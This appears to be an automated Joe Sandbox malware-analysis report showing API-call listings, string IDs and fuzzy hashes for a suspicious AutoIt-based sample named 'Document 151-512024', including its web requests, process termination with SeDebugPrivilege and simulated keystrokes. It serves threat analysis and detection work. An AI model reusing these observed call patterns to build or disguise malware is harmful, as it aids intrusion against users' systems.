                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                    • LoadStringW.USER32(00A12390,?,00000FFF,?), ref: 009B360A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString$_wcslen
                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                    • API String ID: 4099089115-2391861430
                                                                                                    • Opcode ID: 1fa409c933e0bbfc1cc993253632ffa807806f2e34a107b83b76eb06931d266b
                                                                                                    • Instruction ID: a57f723a0c72d1e4ee7ae2c4ee0479f902ae6233352f4c66c330860be838b504
                                                                                                    • Opcode Fuzzy Hash: 1fa409c933e0bbfc1cc993253632ffa807806f2e34a107b83b76eb06931d266b
                                                                                                    • Instruction Fuzzy Hash: 1F516E72840209BADF14EBA0DD86FEEBB78EF44314F048125F505721A2DB311A99DBA1
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009D2E1C
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009D2E4F
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009D2E84
                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009D2EB6
                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009D2EE0
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009D2EF1
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009D2F0B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 2178440468-3368625520
                                                                                                    • Opcode ID: 6d3d4cd9e6ee1d7d88081023b43db89ee1f59cc4c9b5ad956d186d97f6f523df
                                                                                                    • Instruction ID: 0df45b9a5773e036b4c0b0b0c44eb9254221eff14d747241a1628d857fa3196e
                                                                                                    • Opcode Fuzzy Hash: 6d3d4cd9e6ee1d7d88081023b43db89ee1f59cc4c9b5ad956d186d97f6f523df
                                                                                                    • Instruction Fuzzy Hash: 4E3115306891419FDB21CF58DC84FA537E8EBAA750F1481A6FA108F3B1CB71E880DB20
                                                                                                    APIs
                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009BC272
                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009BC29A
                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009BC2CA
                                                                                                    • GetLastError.KERNEL32 ref: 009BC322
                                                                                                    • SetEvent.KERNEL32(?), ref: 009BC336
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 009BC341
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                    • Opcode ID: faca89219c9b339e1e2a6fde6be563d4b312d6098a18f8d37f28d0647c427837
                                                                                                    • Instruction ID: 3bf9363e1651f545a44e362116f8f227d69a1b2a620b2b45c6cf372af0b0be89
                                                                                                    • Opcode Fuzzy Hash: faca89219c9b339e1e2a6fde6be563d4b312d6098a18f8d37f28d0647c427837
                                                                                                    • Instruction Fuzzy Hash: B831AEF1605209AFD7219FA48E88AEB7BFCEB89760F54851EF486D2200DB34DD44DB60
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00983AAF,?,?,Bad directive syntax error,009DCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009A98BC
                                                                                                    • LoadStringW.USER32(00000000,?,00983AAF,?), ref: 009A98C3
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009A9987
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                    • API String ID: 858772685-4153970271
                                                                                                    • Opcode ID: 0adcc12194a1380656551926150a7bb088838cf368ff01004501e1a18944e613
                                                                                                    • Instruction ID: 142f6dc4be734a05c5b944806346b1d9cb49b089bf623ac8b1527cf678b50f6c
                                                                                                    • Opcode Fuzzy Hash: 0adcc12194a1380656551926150a7bb088838cf368ff01004501e1a18944e613
                                                                                                    • Instruction Fuzzy Hash: AE216D3284021EBBDF15AFA0DC1AFEE7779BF58304F04481AF515660A2EB319668DB51
                                                                                                    APIs
                                                                                                    • GetParent.USER32 ref: 009A20AB
                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 009A20C0
                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009A214D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                    • Opcode ID: 054efb47e95b83804db534312ce038d798fd401ffaa8e7ec16e0f80622cb942a
                                                                                                    • Instruction ID: a9d39361b568806bcc5a75c8d818d425a66c1d7510c1beed37ab32fac5fd2542
                                                                                                    • Opcode Fuzzy Hash: 054efb47e95b83804db534312ce038d798fd401ffaa8e7ec16e0f80622cb942a
                                                                                                    • Instruction Fuzzy Hash: 5311C6B6ACC70BB9FA056778EC06EA7379CDF07724F200516FB04A50D1FE65A8426A94
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1282221369-0
                                                                                                    • Opcode ID: 962f1ab80c2702983b4902486f32b7e41120261ceea1c86ace950f7a351a7107
                                                                                                    • Instruction ID: d80c74c27aeab15dabd4c393a12e6b56c1f93b6b4c083b3f1536b962e3640c49
                                                                                                    • Opcode Fuzzy Hash: 962f1ab80c2702983b4902486f32b7e41120261ceea1c86ace950f7a351a7107
                                                                                                    • Instruction Fuzzy Hash: D5613BB3A05311AFDB21AFB4AC91BAE7BA9EF45320F04C16EF94CA7281D7319D418750
                                                                                                    APIs
                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00996890
                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009968A9
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009968B9
                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009968D1
                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009968F2
                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00958874,00000000,00000000,00000000,000000FF,00000000), ref: 00996901
                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0099691E
                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00958874,00000000,00000000,00000000,000000FF,00000000), ref: 0099692D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268354404-0
                                                                                                    • Opcode ID: 30f5fdf5fd95662441ddcd02c330f6c3c546a338deb7f1001f75c5def69c50b7
                                                                                                    • Instruction ID: b83f7b9c3b8ebdb4e796cbf4b6ad824973fa8acb3ec29396fe6aa9205c3904e6
                                                                                                    • Opcode Fuzzy Hash: 30f5fdf5fd95662441ddcd02c330f6c3c546a338deb7f1001f75c5def69c50b7
                                                                                                    • Instruction Fuzzy Hash: FB519DB0600205EFDF20CF2ACC55FAA7BB9FB88761F104519F952A72A0DB70E995DB50
                                                                                                    APIs
                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009BC182
                                                                                                    • GetLastError.KERNEL32 ref: 009BC195
                                                                                                    • SetEvent.KERNEL32(?), ref: 009BC1A9
                                                                                                      • Part of subcall function 009BC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009BC272
                                                                                                      • Part of subcall function 009BC253: GetLastError.KERNEL32 ref: 009BC322
                                                                                                      • Part of subcall function 009BC253: SetEvent.KERNEL32(?), ref: 009BC336
                                                                                                      • Part of subcall function 009BC253: InternetCloseHandle.WININET(00000000), ref: 009BC341
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 337547030-0
                                                                                                    • Opcode ID: 1978c44bb60590a715c538fc7d7ee474218eef78f2f201556cf09d8588ebb338
                                                                                                    • Instruction ID: 0b7626ffd35bf3e6c8cf874e2d40bdf469e7209cf04f5b11452e45923655a3f1
                                                                                                    • Opcode Fuzzy Hash: 1978c44bb60590a715c538fc7d7ee474218eef78f2f201556cf09d8588ebb338
                                                                                                    • Instruction Fuzzy Hash: 6931A0B1245606BFDB219FA5DE04AA6BBFDFF58320B00441EF966C6610C730E850EBA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 009A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009A3A57
                                                                                                      • Part of subcall function 009A3A3D: GetCurrentThreadId.KERNEL32 ref: 009A3A5E
                                                                                                      • Part of subcall function 009A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009A25B3), ref: 009A3A65
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 009A25BD
                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009A25DB
                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009A25DF
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 009A25E9
                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009A2601
                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 009A2605
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 009A260F
                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009A2623
                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 009A2627
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2014098862-0
                                                                                                    • Opcode ID: 5199a52b1d589be2149205d2f235447efddc3c168f2aca124ea86690cd9dbe28
                                                                                                    • Instruction ID: 02de8259b9f2e1f1ce8e78a0b3c02bb077ee8ea69fa32b297c9fb3d03d98730a
                                                                                                    • Opcode Fuzzy Hash: 5199a52b1d589be2149205d2f235447efddc3c168f2aca124ea86690cd9dbe28
                                                                                                    • Instruction Fuzzy Hash: 4501D8707D8321BBFB106B689C8AF593F59DB8EB11F500002F314AF0D1C9E15484DAA9
                                                                                                    APIs
                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,009A1449,?,?,00000000), ref: 009A180C
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,009A1449,?,?,00000000), ref: 009A1813
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009A1449,?,?,00000000), ref: 009A1828
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,009A1449,?,?,00000000), ref: 009A1830
                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,009A1449,?,?,00000000), ref: 009A1833
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009A1449,?,?,00000000), ref: 009A1843
                                                                                                    • GetCurrentProcess.KERNEL32(009A1449,00000000,?,009A1449,?,?,00000000), ref: 009A184B
                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,009A1449,?,?,00000000), ref: 009A184E
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,009A1874,00000000,00000000,00000000), ref: 009A1868
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1957940570-0
                                                                                                    • Opcode ID: 2283ad668598682ca35b9793f9479d5e579f68f402e4ce16d57668a3736b3bf3
                                                                                                    • Instruction ID: 857094701d6eb04a1ec85eb02285729e154251f40d40a6996eb480a5b63fef31
                                                                                                    • Opcode Fuzzy Hash: 2283ad668598682ca35b9793f9479d5e579f68f402e4ce16d57668a3736b3bf3
                                                                                                    • Instruction Fuzzy Hash: 6901FBB5295319BFE710ABA5DC4DF6B3BACEB89B40F004411FA04DB1A1CA709840DB20
                                                                                                    APIs
                                                                                                      • Part of subcall function 00947620: _wcslen.LIBCMT ref: 00947625
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009AC6EE
                                                                                                    • _wcslen.LIBCMT ref: 009AC735
                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009AC79C
                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009AC7CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                    • String ID: 0$Pl$Pl
                                                                                                    • API String ID: 1227352736-2856975402
                                                                                                    • Opcode ID: 2f794baf61947f2373722aca0e90ef91d7db43222a2ba69f1a2eeb33073160e5
                                                                                                    • Instruction ID: 9fe1357a0db60b11c5e7b735980834da97ee670b17b7d6cd0504f5cd15e094de
                                                                                                    • Opcode Fuzzy Hash: 2f794baf61947f2373722aca0e90ef91d7db43222a2ba69f1a2eeb33073160e5
                                                                                                    • Instruction Fuzzy Hash: F451B0B16083019BD715DF28C885BAB77E8EF8A314F040A29F995EB291DB64D944CFD2
                                                                                                    APIs
                                                                                                      • Part of subcall function 009AD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 009AD501
                                                                                                      • Part of subcall function 009AD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 009AD50F
                                                                                                      • Part of subcall function 009AD4DC: CloseHandle.KERNEL32(00000000), ref: 009AD5DC
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009CA16D
                                                                                                    • GetLastError.KERNEL32 ref: 009CA180
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009CA1B3
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 009CA268
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 009CA273
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009CA2C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                    • String ID: SeDebugPrivilege
                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                    • Opcode ID: 4ac7fb19466b1c299c452cb31406536156a4c2fc8347b853b98f810541470c7b
                                                                                                    • Instruction ID: 6f16c3e6a8687418cc736952760475dd295aca9fec9a4bbeeb3a630a8ec83d59
                                                                                                    • Opcode Fuzzy Hash: 4ac7fb19466b1c299c452cb31406536156a4c2fc8347b853b98f810541470c7b
                                                                                                    • Instruction Fuzzy Hash: A06190706092529FD720DF14C494F19BBE5AF8431CF18849CE4668B7A3C776ED49CB92
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009D3925
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 009D393A
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009D3954
                                                                                                    • _wcslen.LIBCMT ref: 009D3999
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 009D39C6
                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009D39F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                    • String ID: SysListView32
                                                                                                    • API String ID: 2147712094-78025650
                                                                                                    • Opcode ID: de507b20cc5d92adc06bf690d400952004cb29ee184a926ca028012e92626b00
                                                                                                    • Instruction ID: f0ee36cc14b6a87a787a22bbbb34ddaf620bc01b7d72303e5db88edcbac82bdb
                                                                                                    • Opcode Fuzzy Hash: de507b20cc5d92adc06bf690d400952004cb29ee184a926ca028012e92626b00
                                                                                                    • Instruction Fuzzy Hash: 2D41C271A40219ABEF219F64CC45FEA7BA9EF48350F108527F948E7281D771DA80CB90
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0099F3AB,00000000,?,?,00000000,?,0099682C,00000004,00000000,00000000), ref: 009D824C
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 009D8272
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 009D82D1
                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 009D82E5
                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 009D830B
                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 009D832F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                    • String ID: 0n
